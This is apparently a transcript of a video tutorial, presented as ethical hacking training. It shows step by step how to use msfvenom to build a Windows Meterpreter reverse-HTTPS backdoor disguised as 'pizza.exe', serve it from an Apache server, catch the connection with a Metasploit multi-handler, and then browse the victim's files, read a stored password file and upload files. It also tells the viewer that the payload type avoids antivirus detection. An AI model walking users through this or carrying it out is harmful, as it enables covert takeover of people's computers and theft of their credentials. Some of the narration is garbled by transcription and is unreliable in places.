Hello everyone. So in this video log, we are going to learn about backdoors. Before we start backdoors, it is very important to know as an ethical hacker, we are going to find ourselves in many situations where we would be required to create backdoors. A backdoor is a program that allows you to get full control or full access of a system on which your backdoor gets executed. So backdoor is an executable program. When I say that you can gain complete access of the system on which your backdoor.exe is getting executed, I mean to say that you can execute all of the system commands and you can also get access to the system resources. Resources like the storage, you can visit the file systems, read, write, and execute. You can also get the access to the keyboard. You also get access to webcams and etc. In a very layman language, if I can explain, you can do whatever a legit user can do on that system. You get access to do all of these. Isn't it interesting? Backdoor.exe is used to create malicious executables via the Metasploit framework MSF Venom tool. It is designed to grant an attacker's persistent access to victim system. So without further wasting any time, let's move to our Kali window. And first thing I want to show you is the different payloads that we can use using the MFS Venom. So now I'm in root and I'll be typing the command. So MFS Venom is the tool. I'll be listing all the payloads that it supports. It will take some time to load all because we will be getting a huge list of it. So let's wait. So before I move further, I want to first explain this structure, what we follow in the payload. The very first thing is, these are made up of three parts. First, what is the platform? As you can see over here, it's Windows. It could be Linux, Mac, Java, Python, etc. Then second comes the, over here it's Meterpreter, but this is actually the type of payload that we're using. We are using Meterpreter because this runs in memory, and as it is avoiding to write on disk, so it becomes harder for the antiviruses to detect it. So we will be using this Meterpreter type of payload. And then we have a reverse HTTP. Over here also, if you see, there are two parts to it. First is the reverse and second one is the protocol. So what is this reverse? I'll be explaining it in a while. So when we see it as reverse or a bind, these are the two directions when we are using a backdoor. So two direction will be always mentioned, either bind or reverse. So first, if I talk about bind, when your backdoor gets executed on the target machine, a socket gets created on the target machine, which opens a port. And whenever you have to establish a connection, you establish it through using that port. For example, in this, if it was bind HTTPS, so 8080 port, if you are going to bind, so from your victims or the target machine, you will be establishing a connection using the port. The port will be opened on the victim side. In reverse order, that means your system will open a port and only a connection needs to be established from the victim's system. This one is much easier and also there are less chances of getting detected in the reverse malware. So we will be using, going forward when we will be creating a backdoor, we will be using the reverse HTTP. Now that we understand what is a payload and how we are going to use it for creating a backdoor, let's create our own backdoor. So now we are creating our own backdoor.exe. For that, first let's understand what is the IP address of my Kali Linux. So I'm giving ifconfig and we see this one is my IP. Next is to understand what are the different options available with us for creating these kind of payloads. Okay, so I'll be typing the command mfs venom -hyphen payload. Windows. So now I'm giving the platform, that is Windows. I'm giving the type, that is Meterpreter. Then what kind of direction I'm going to use? I'll be using a reverse HTTPS direction, and then I'll be giving and I will be listing all options. So I will get all the options for creating this payload and then we will choose the basic one. So these are the lists. You can see there are some advanced options for payload where we can do many things. But right now, for this demonstration, I'm just using the basic options. So you can see from here. Over here, what all things we can do is we can set L host, we can set the L port. Okay, so yeah, I'm interested in these two things. So let me show you the command for it. I'll use the up arrow and then I'll add the further command to it. I'll be setting L host. And then I have to give my IP. Okay, so it's 192.168.1.2. Okay, and the next is I also need to set port on which I would be listening. So port 8080. And then I would be saving this in a format exe, and then let me also put it, like, export it out. File needs to be named as pizza.exe. Okay, and I give a enter. Okay, so we got this file saved as pizza.exe, and we need to check this file where this file is created. So we can check from TWD what is our present working directory. It's home Pragya. So if I go to the file manager, Pragya, pizza.exe. So here you can see pizza.exe is already created. So this was creating our own backdoor.exe. Now next, we would be establishing a connection. We'll be seeing how we can establish the connection, and then finally we'll have the Windows 11. So next, we will be first launching the MSF console. So we'll do that. It will take some time. We will be using the Metasploit framework, as I've already told, and MFS Venom is industry required tool, so we must know how to use it. Now, when we are in the MFS console, we need to start a module which will open, which has us to open port in our computer so that we can establish connection using that. So we will be using exploit multi handler. This is nothing but a module. So as you can see, we are now inside this. Now if I do show options, we'll be seeing these things. So L host, the listening address, and the L port, the listening port. So now we need to make changes. We need to modify this because we want it to be the same for which we have created our backdoor. So for L host, we will be using our IP address that was 192.168.1.2, and also the L port that we were using was 8080. So let us modify this. We can also check using the help command, but directly I will be setting this. Set payload, Windows Meterpreter, reverse, HTTPS. We did not get any error, so this means this is set. Then set L host. Okay, once we have done this, if we do now show options, you're just seeing exactly what we have set. So over here, these L host you can see and the L port you can see. So it is now the same as what we were having for our backdoor. And now the last, we press the exploit command, and then we can see that it is trying to open up the connection. So you can see started HTTPS reverse handler on this. So yeah, this means that we have started successfully listening on this port. So now as we can see that we have started HTTPS reverse handler on this particular URL, and we are listening at 8080 port. So once the exe, the backdoor.exe that I have created, which is named as pizza.exe, once it gets executed on the target machine, we will be establishing a connection using this, and it will be listening at 8080 port. So the plan is that we will be using the web server which is inbuilt within Kali. We will be uploading our .exe, pizza.exe backdoor file over there, and will be downloading it directly into the target machine. So first thing that I will be doing is, right now we have this file in the home Pragya directory. I would be moving it to the web server where it keeps. So as we know, the web server's location is where www class HTML. So I'll be going inside that, and I have a directory over there named as able files. So I'll be placing my backdoor on that directory itself. So I will be copying and the location. Okay, so now let me list. Yeah, cool. So we have this pizza.exe under this evil-file. Next, let's start the web server. So for that, the command is service apache 2 start. Okay, so let us now go and check that if this Apache's homepage is getting loaded on the other system, on the target system or not. So now we can see that it is the index.html, the landing page on which it is ending. So rather than this page, we want to land up to our file. So let us navigate. Over here, we can see the pizza.exe, and if we execute over it, we'll get the connection established over there. So let's quickly hit this. So now as you can see that we have pizza.exe within our downloads folder. So if I just run this, and here we go, we can see we have got some session 1 opened. So now in this demonstration, you will see that we have received the request, the connection request from the target machine. And now you are seeing we are in the meterpreter, which means that we have gained the access of the system. Now let us quickly run few of the commands to see what kind of access we have on that system. So here we can see by using the system information, we can get all information regarding the system which got hacked, like computer Windows 11, OS, what is the build architecture, what is the system language, domain, lockdown users, and meterpreter. So these things we can understand. So I have given a command pwd, and I can see where this user is in the downloads. If I want to list all the files of downloads, so I can see password. So this looks interesting, and I want to view what is within this password. So I'll give ls password. So okay, under this I see a user1.txt file. So let me read this file. Cat user.txt. Okay, user1.txt. And I can see user1, user at the rate 123. So in this way, whatever the user can do on his system, I can do it as well from here. Even I can upload some files without his knowledge, without his permission. So these kind of things we can gain access using the PyTorch. You can see the same file over here. If I go to the screen, and within the password, we have this user1 and user123. So now finally, let us see how we can upload something. So I will upload this file on the target system. So we can see that this file got uploaded over there. Let us just check it quickly. Yeah. So under this, we can see this. I'll hack your computer, want to enjoy free pizza. So that was all for today's demonstration. I hope you enjoyed watching it. Thank you so much.